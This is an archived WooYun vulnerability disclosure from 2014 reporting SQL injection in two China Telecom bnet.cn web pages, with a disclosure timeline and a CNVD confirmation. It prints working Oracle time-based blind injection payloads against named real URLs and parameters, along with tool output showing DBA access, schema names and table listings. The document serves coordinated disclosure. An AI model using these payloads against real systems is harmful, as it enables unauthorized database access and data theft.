乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-02: 细节已通知厂商并且等待厂商处理中 2014-04-07: 厂商已经确认,细节仅向厂商公开 2014-04-17: 细节向核心白帽子及相关领域专家公开 2014-04-27: 细节向普通白帽子公开 2014-05-07: 细节向实习白帽子公开 2014-05-17: 细节向公众公开
电信注入
http://cq.bnet.cn/hccDocInfoEx.do?action=list FILETITLE=88952634&pageIndex=88952634&BIGTYPE=88952634 POST型注入http://zj.bnet.cn/lhzxExProdProduct.do?action=showsearchaplist&flag=zjWeb GROUPCODE=1008&PRODNAME=88952634 POST型注入
DBA权限,数据库:
Place: POSTParameter: FILETITLE Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: FILETITLE=88952634%' AND 1845=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(108)||CHR(105)||CHR(66),5) AND '%'='&pageIndex=88952634&BIGTYPE=88952634---web application technology: JSPback-end DBMS: Oracleavailable databases [1]:[*] CQSWLH
Tables:
Database: CQSWLH[22 tables]+----------------------+| DESCRIPTIONS_REGIONS || MARKET || PERSONAL || SUBCATEGORY || SUBJECTS || TISCH || VARIANTS || ATIVIDADE || CDB_ORDERS || CDV_PASSPORT_SET || CONFIGLIST || COUNTRY_DISEASES || ETUDIANT || JIVESASLAUTHORIZED || MUSHROOM_NBC || NUKE_FAQCATEGORIES || PARTENAIRE || PRIMARYTEST2 || QUERYCACHETWO || SB_HOST_ADMIN || TELEFONE || USERN |+----------------------+
USERN字段:
Table: USERN[10 columns]+-------------------+-------------+| Column | Type |+-------------------+-------------+| ACCOUNTNAME | non-numeric || CLASSCATEGORY_ID2 | non-numeric || E_ID | non-numeric || IDSTATOCIVILE | non-numeric || LLOGARIA | non-numeric || MENUTYPE | non-numeric || PERSISTENT | non-numeric || PNO | non-numeric || TEMPLATE_CODE | non-numeric || VM_PAYMENT_METHOD | non-numeric |+-------------------+-------------+
DBA:
Place: POSTParameter: GROUPCODE Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: GROUPCODE=1008' AND 8419=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(98)||CHR(114)||CHR(120),5) AND 'viiU'='viiU&PRODNAME=88952634---web application technology: JSPback-end DBMS: Oraclecurrent user is DBA: True
数据库:
Place: POSTParameter: GROUPCODE Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: GROUPCODE=1008' AND 8419=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(98)||CHR(114)||CHR(120),5) AND 'viiU'='viiU&PRODNAME=88952634---web application technology: JSPback-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'LHZX'
白名单
危害等级:高
漏洞Rank:11
确认时间:2014-04-07 08:34
CNVD确认并复现所述情况,已经转由CNCERT通报给中国电信集团公司处置。
暂无